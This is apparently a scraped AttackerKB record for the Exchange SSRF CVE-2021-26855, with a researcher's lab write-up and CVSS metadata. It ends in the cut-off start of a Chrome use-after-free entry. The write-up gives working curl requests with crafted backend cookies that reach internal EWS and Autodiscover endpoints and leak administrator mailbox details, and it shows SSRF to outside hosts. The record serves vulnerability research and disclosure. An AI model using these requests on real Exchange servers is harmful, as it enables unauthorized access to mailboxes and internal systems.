</Protocol>\n <Protocol>\n <Type>EXPR</Type>\n <Server>win-t4ro9496ta7.gibson.local</Server>\n <SSL>Off</SSL>\n <AuthPackage>Ntlm</AuthPackage>\n <ServerExclusiveConnect>on</ServerExclusiveConnect>\n <CertPrincipalName>None</CertPrincipalName>\n <GroupingInformation>Default-First-Site-Name</GroupingInformation>\n </Protocol>\n <Protocol>\n <Type>WEB</Type>\n <Internal>\n <OWAUrl AuthenticationMethod=\"Basic, Fba\">https://win-t4ro9496ta7.gibson.local/owa/</OWAUrl>\n <Protocol>\n <Type>EXCH</Type>\n <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>\n </Protocol>\n </Internal>\n </Protocol>\n </Account>\n </Response>\n * Connection #0 to host 192.168.123.207 left intact\n </Autodiscover>* Closing connection 0\n wvu@kharak:~/Downloads$\n \n\n**cdelafuente-r7** at March 24, 2021 2:49pm UTC reported:\n\n# CVE-2021-26855\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is an SSRF vulnerability in Exchange that allows privileged access to Exchange\u2019s backend resources, ultimately leading to pre-auth RCE when [combined](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) with CVEs such as [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>).\n\n## Microsoft\u2019s (Nmap) NSE script\n\nConveniently disclosed in Microsoft\u2019s [alternative mitigations](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>), [this script](<https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse>) provides an easily reproducible PoC for CVE-2021-26855. My findings below are reflective of that.\n \n \n wvu@kharak:~/Downloads$ ls\n http-vuln-cve2021-26855.nse\n wvu@kharak:~/Downloads$ nmap -Pn -T4 -n -v -p 443 --open --script http-vuln-cve2021-26855 192.168.123.183\n Host discovery disabled (-Pn). 
All addresses will be marked 'up' and scan times will be slower.\n Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 00:50 CST\n NSE: Loaded 1 scripts for scanning.\n NSE: Script Pre-scanning.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.00s elapsed\n Initiating Connect Scan at 00:50\n Scanning 192.168.123.183 [1 port]\n Discovered open port 443/tcp on 192.168.123.183\n Completed Connect Scan at 00:50, 0.00s elapsed (1 total ports)\n NSE: Script scanning 192.168.123.183.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.02s elapsed\n Nmap scan report for 192.168.123.183\n Host is up (0.00064s latency).\n \n PORT STATE SERVICE\n 443/tcp open https\n | http-vuln-cve2021-26855:\n | VULNERABLE:\n | Exchange Server SSRF Vulnerability\n | State: VULNERABLE\n | IDs: CVE:CVE-2021-26855\n | Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010 are vulnerable to a SSRF via the X-AnonResource-Backend and X-BEResource cookies.\n |\n | Disclosure date: 2021-03-02\n | References:\n | https://vulners.com/cve/CVE-2021-26855\n |_ http://aka.ms/exchangevulns\n \n NSE: Script Post-scanning.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.00s elapsed\n Read data files from: /usr/local/bin/../share/nmap\n Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds\n wvu@kharak:~/Downloads$\n \n\n### Ported to [curl(1)](<https://curl.se/>)\u2026\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;\" https://192.168.123.183/owa/auth/x.js\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client 
hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7f8cb580b400)\n > GET /owa/auth/x.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 500\n < cache-control: private\n < content-type: text/html; charset=utf-8\n < server: Microsoft-IIS/10.0\n < request-id: 864475e3-ee01-48a5-acf3-1b1cbbc50c02\n < x-calculatedbetarget: localhost\n < x-calculatedbetarget: localhost\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < x-powered-by: ASP.NET\n < date: Tue, 09 Mar 2021 06:52:07 GMT\n < content-length: 85\n <\n * Connection #0 to host 192.168.123.183 left intact\n NegotiateSecurityContext failed with for host 'localhost' with status 'TargetUnknown'* Closing connection 0\n wvu@kharak:~$\n \n\n## SSRF to an 
arbitrary remote host\n\nYou can specify an arbitrary host in `X-AnonResource-Backend`.\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~$RANDOM\" \"https://192.168.123.183/owa/auth/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7f9ea080d600)\n > GET /owa/auth/22702.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n \n\n### Catching the request in [ncat(1)](<https://nmap.org/ncat/>)\u2026\n \n \n wvu@kharak:~$ ncat -lkv --ssl 
443\n Ncat: Version 7.91 ( https://nmap.org/ncat )\n Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.\n Ncat: SHA-1 fingerprint: F55B E690 D8F2 84F1 EC64 816A 5763 2F5B B56F 0D72\n Ncat: Listening on :::443\n Ncat: Listening on 0.0.0.0:443\n Ncat: Connection from 192.168.123.183.\n Ncat: Connection from 192.168.123.183:6303.\n GET /owa/auth/22702.js HTTP/1.1\n X-FE-ClientIP: 192.168.123.1\n X-Forwarded-For: 192.168.123.1\n X-Forwarded-Port: 55723\n X-MS-EdgeIP:\n X-ExCompId: ClientAccessFrontEnd\n Accept: */*\n User-Agent: curl/7.64.1\n X-OriginalRequestHost: 192.168.123.183\n X-OriginalRequestHostSchemePort: 443:https:192.168.123.183\n X-MSExchangeActivityCtx: V=1.0.0.0;Id=26678ebf-2d0f-42bd-bac3-2d27889baed8;C=;P=\n msExchProxyUri: https://192.168.123.183/owa/auth/22702.js\n X-IsFromCafe: 1\n X-SourceCafeServer: WIN-T4RO9496TA7.GIBSON.LOCAL\n X-CommonAccessToken: VgEAVAlBbm9ueW1vdXNDAEUAAAAA\n X-vDirObjectId: 621dccd3-6dff-49aa-87be-7911a110125e\n Host: 192.168.123.1\n Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563\n Connection: Keep-Alive\n \n\nThe fun folks working on the [Nuclei scanner](<https://github.com/projectdiscovery/nuclei>) noticed [burpcollaborator.net](<https://burpcollaborator.net/>) made a [good target](<https://github.com/projectdiscovery/nuclei-templates/pull/1032>) for their scanner.\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~$RANDOM\" \"https://192.168.123.183/owa/auth/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS 
handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7fd58480f600)\n > GET /owa/auth/18409.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~31368\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 200\n < cache-control: private\n < content-type: text/html\n < server: Microsoft-IIS/10.0\n < request-id: 31688df5-982d-4d18-86d1-ae0e99c00ce8\n < x-calculatedbetarget: burpcollaborator.net\n < x-collaborator-version: 4\n < x-aspnet-version: 4.0.30319\n < x-powered-by: ASP.NET\n < date: Tue, 09 Mar 2021 07:58:52 GMT\n < content-length: 1190\n <\n <!DOCTYPE html>\n <html>\n <head>\n <meta charset=\"UTF-8\">\n </head>\n <body>\n <h1>Burp Collaborator Server</h1>\n <p>Burp Collaborator is a service that is used by <a href=\"https://portswigger.net/burp/\">Burp Suite</a> when testing web applications for security\n vulnerabilities. 
Some of Burp Suite's tests may cause the application being\n tested to interact with the Burp Collaborator server, to enable Burp Suite\n to detect various security vulnerabilities.\n </p><p>The Burp Collaborator server does not itself initiate any interactions with\n any system, and only responds to interactions that it receives from other\n systems.\n </p><p>If you are a systems administrator and you are seeing interactions with the\n Burp Collaborator server in your logs, then it is likely that someone is\n testing your web application using Burp Suite. If you are trying to identify\n the person responsible for this testing, you should review your web server\n or applications logs for the time at which these interactions were initiated\n by your systems.\n </p><p>For further details about Burp Collaborator, please see the <a href=\"https://portswigger.net/burp/documentation/collaborator/\">full documentation</a>.</p></body>\n * Connection #0 to host 192.168.123.183 left intact\n </html>* Closing connection 0\n wvu@kharak:~$\n \n\n## SSRF to a privileged backend resource\n\nHostname `WIN-T4RO9496TA7` is from the `x-feserver` header.\n \n \n wvu@kharak:~$ curl -kvb \"X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~$RANDOM\" \"https://192.168.123.183/ecp/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 
(IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7faac2808200)\n > GET /ecp/1849.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~22406\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 200\n < cache-control: private\n < content-type: text/html; charset=UTF-8\n < server: Microsoft-IIS/10.0\n < request-id: b4762a11-d418-43f8-a435-f04420289a4c\n < x-calculatedbetarget: win-t4ro9496ta7\n < x-calculatedbetarget: win-t4ro9496ta7.gibson.local\n < x-diaginfo: WIN-T4RO9496TA7\n < x-beserver: WIN-T4RO9496TA7\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < set-cookie: exchangecookie=ef4d50599057429b849b92e9059455af; expires=Wed, 09-Mar-2022 07:00:11 GMT; path=/; HttpOnly\n < set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s/Gq8/Ixc7Pxc7O; expires=Tue, 09-Mar-2021 07:10:11 GMT; path=/EWS; secure; HttpOnly\n < x-powered-by: ASP.NET\n < x-feserver: WIN-T4RO9496TA7\n < date: Tue, 09 Mar 2021 07:00:11 GMT\n < content-length: 2836\n <\n <HTML lang=\"en\"><HEAD><link rel=\"alternate\" type=\"text/xml\" href=\"https://win-t4ro9496ta7.gibson.local:444/EWS/Exchange.asmx?disco\"/><STYLE type=\"text/css\">#content{ FONT-SIZE: 0.7em; PADDING-BOTTOM: 2em; MARGIN-LEFT: 
30px}BODY{MARGIN-TOP: 0px; MARGIN-LEFT: 0px; COLOR: #000000; FONT-FAMILY: Verdana; BACKGROUND-COLOR: white}P{MARGIN-TOP: 0px; MARGIN-BOTTOM: 12px; COLOR: #000000; FONT-FAMILY: Verdana}PRE{BORDER-RIGHT: #f0f0e0 1px solid; PADDING-RIGHT: 5px; BORDER-TOP: #f0f0e0 1px solid; MARGIN-TOP: -5px; PADDING-LEFT: 5px; FONT-SIZE: 1.2em; PADDING-BOTTOM: 5px; BORDER-LEFT: #f0f0e0 1px solid; PADDING-TOP: 5px; BORDER-BOTTOM: #f0f0e0 1px solid; FONT-FAMILY: Courier New; BACKGROUND-COLOR: #e5e5cc}.heading1{MARGIN-TOP: 0px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 26px; MARGIN-BOTTOM: 0px; PADDING-BOTTOM: 3px; MARGIN-LEFT: -30px; WIDTH: 100%; COLOR: #ffffff; PADDING-TOP: 10px; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #003366}.intro{display: block; font-size: 1em;}</STYLE><TITLE>Service</TITLE></HEAD><BODY><DIV id=\"content\" role=\"main\"><h1 class=\"heading1\">Service</h1><BR/><P class=\"intro\">You have created a service.<P class='intro'>To test this service, you will need to create a client and use it to call the service. You can do this using the svcutil.exe tool from the command line with the following syntax:</P> <BR/><PRE>svcutil.exe <A HREF=\"https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl\">https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl</A></PRE></P><P class=\"intro\">This will generate a configuration file and a code file that contains the client class. Add the two files to your client application and use the generated client class to call the Service. 
For example:<BR/></P><h2 class='intro'>C#</h2><br /><PRE><font color=\"blue\">class </font><font color=\"black\">Test\n </font>{\n <font color=\"blue\"> static void </font>Main()\n {\n <font color=\"black\">HelloClient</font> client = <font color=\"blue\">new </font><font color=\"black\">HelloClient</font>();\n \n <font color=\"darkgreen\"> // Use the 'client' variable to call operations on the service.\n \n </font><font color=\"darkgreen\"> // Always close the client.\n </font> client.Close();\n }\n }\n </PRE><BR/><h2 class='intro'>Visual Basic</h2><br /><PRE><font color=\"blue\">Class </font><font color=\"black\">Test\n </font><font color=\"blue\"> Shared Sub </font>Main()\n <font color=\"blue\"> Dim </font>client As <font color=\"black\">HelloClient</font> = <font color=\"blue\">New </font><font color=\"black\">HelloClient</font>()\n <font color=\"darkgreen\"> ' Use the 'client' variable to call operations on the service.\n \n </font><font color=\"darkgreen\"> ' Always close the client.\n </font> client.Close()\n <font color=\"blue\"> End Sub\n * Connection #0 to host 192.168.123.183 left intact\n </font><font color=\"blue\">End Class</font></PRE></DIV></BODY></HTML>* Closing connection 0\n wvu@kharak:~$\n \n\n`POST`ing to the [EWS](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/ews-reference-for-exchange>) endpoint (not shown) allows an attacker access to a target\u2019s mailbox. 
A sample [Autodiscover request](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/pox-autodiscover-request-for-exchange>) is shown below.\n \n \n wvu@kharak:~/Downloads$ cat poc.xml\n <?xml version=\"1.0\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>Administrator@gibson.local</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n wvu@kharak:~/Downloads$ curl -kvb \"X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~$RANDOM\" -H \"Content-Type: text/xml\" \"https://192.168.123.207/ecp/$RANDOM.js\" -d @poc.xml\n * Trying 192.168.123.207...\n * TCP_NODELAY set\n * Connected to 192.168.123.207 (192.168.123.207) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * 
Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7fa592808200)\n > POST /ecp/3425.js HTTP/2\n > Host: 192.168.123.207\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~24753\n > Content-Type: text/xml\n > Content-Length: 354\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n * We are completely uploaded and fine\n < HTTP/2 200\n < cache-control: private\n < content-type: text/xml; charset=utf-8\n < server: Microsoft-IIS/10.0\n < request-id: bde5e90a-fe14-4b47-aaca-1a713d9832b1\n < x-calculatedbetarget: win-t4ro9496ta7\n < x-calculatedbetarget: win-t4ro9496ta7.gibson.local\n < x-diaginfo: WIN-T4RO9496TA7\n < x-beserver: WIN-T4RO9496TA7\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s7Pq8/OxczJxc7G; expires=Wed, 10-Mar-2021 01:36:19 GMT; path=/autodiscover; secure; HttpOnly\n < x-powered-by: ASP.NET\n < x-feserver: WIN-T4RO9496TA7\n < date: Wed, 10 Mar 2021 01:26:19 GMT\n < content-length: 3866\n <\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006\">\n <Response xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\">\n <User>\n <DisplayName>Administrator</DisplayName>\n <LegacyDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=94812d66d68146e8b6ac7b3312a93d7b-Admin</LegacyDN>\n <AutoDiscoverSMTPAddress>Administrator@gibson.local</AutoDiscoverSMTPAddress>\n <DeploymentId>eb64d327-1a67-4c9c-b64d-38d567e95480</DeploymentId>\n </User>\n <Account>\n <AccountType>email</AccountType>\n <Action>settings</Action>\n <MicrosoftOnline>False</MicrosoftOnline>\n <Protocol>\n 
<Type>EXCH</Type>\n <Server>47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</Server>\n <ServerDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</ServerDN>\n <ServerVersion>73C18880</ServerVersion>\n <MdbDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local/cn=Microsoft Private MDB</MdbDN>\n <PublicFolderServer>win-t4ro9496ta7.gibson.local</PublicFolderServer>\n <AD>WIN-T4RO9496TA7.gibson.local</AD>\n <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>\n <EwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EwsUrl>\n <EmwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EmwsUrl>\n <EcpUrl>https://win-t4ro9496ta7.gibson.local/owa/</EcpUrl>\n <EcpUrl-um>?path=/options/callanswering</EcpUrl-um>\n <EcpUrl-aggr>?path=/options/connectedaccounts</EcpUrl-aggr>\n <EcpUrl-mt>options/ecp/PersonalSettings/DeliveryReport.aspx?rfr=olk&exsvurl=1&IsOWA=<IsOWA>&MsgID=<MsgID>&Mbx=<Mbx>&realm=gibson.local</EcpUrl-mt>\n <EcpUrl-ret>?path=/options/retentionpolicies</EcpUrl-ret>\n <EcpUrl-sms>?path=/options/textmessaging</EcpUrl-sms>\n <EcpUrl-photo>?path=/options/myaccount/action/photo</EcpUrl-photo>\n <EcpUrl-tm>options/ecp/?rfr=olk&ftr=TeamMailbox&exsvurl=1&realm=gibson.local</EcpUrl-tm>\n <EcpUrl-tmCreating>options/ecp/?rfr=olk&ftr=TeamMailboxCreating&SPUrl=<SPUrl>&Title=<Title>&SPTMAppUrl=<SPTMAppUrl>&exsvurl=1&realm=gibson.local</EcpUrl-tmCreating>\n <EcpUrl-tmEditing>options/ecp/?rfr=olk&ftr=TeamMailboxEditing&Id=<Id>&exsvurl=1&realm=gibson.local</EcpUrl-tmEditing>\n <EcpUrl-extinstall>?path=/options/manageapps</EcpUrl-extinstall>\n <OOFUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</OOFUrl>\n <UMUrl>https://win-t4ro9496ta7.gibson.local/EWS/UM2007Legacy.asmx</UMUrl>\n <ServerExclusiveConnect>off</ServerExclusiveConnect>\n 
</Protocol>\n <Protocol>\n <Type>EXPR</Type>\n <Server>win-t4ro9496ta7.gibson.local</Server>\n <SSL>Off</SSL>\n <AuthPackage>Ntlm</AuthPackage>\n <ServerExclusiveConnect>on</ServerExclusiveConnect>\n <CertPrincipalName>None</CertPrincipalName>\n <GroupingInformation>Default-First-Site-Name</GroupingInformation>\n </Protocol>\n <Protocol>\n <Type>WEB</Type>\n <Internal>\n <OWAUrl AuthenticationMethod=\"Basic, Fba\">https://win-t4ro9496ta7.gibson.local/owa/</OWAUrl>\n <Protocol>\n <Type>EXCH</Type>\n <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>\n </Protocol>\n </Internal>\n </Protocol>\n </Account>\n </Response>\n * Connection #0 to host 192.168.123.207 left intact\n </Autodiscover>* Closing connection 0\n wvu@kharak:~/Downloads$\n \n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:00:00", "type": "attackerkb", "title": "CVE-2021-26855", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", 
"CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-03T00:00:00", "id": "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "href": "https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-23T17:13:30", "description": "Use after free in Blink in Google Chrome prior to 89.0.4389.90 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at March 15, 2021 6:18am UTC reported:\n\nReported as exploited in the wild at <https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html> and at <https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html>.\n\nThis bug seems to have scarce details from what I can tell online, however it appears to be a UAF bug within Blink that was reported by an anonymous researcher on 2021-03-09. The details for this bug are currently locked so that only Google employees can access it, but should it be opened to the public the details will be at <https://bugs.chromium.org/p/chromium/issues/detail?id=1186287>.\n\nAs per usual the advice to protect against UAF bugs in browsers is to disable 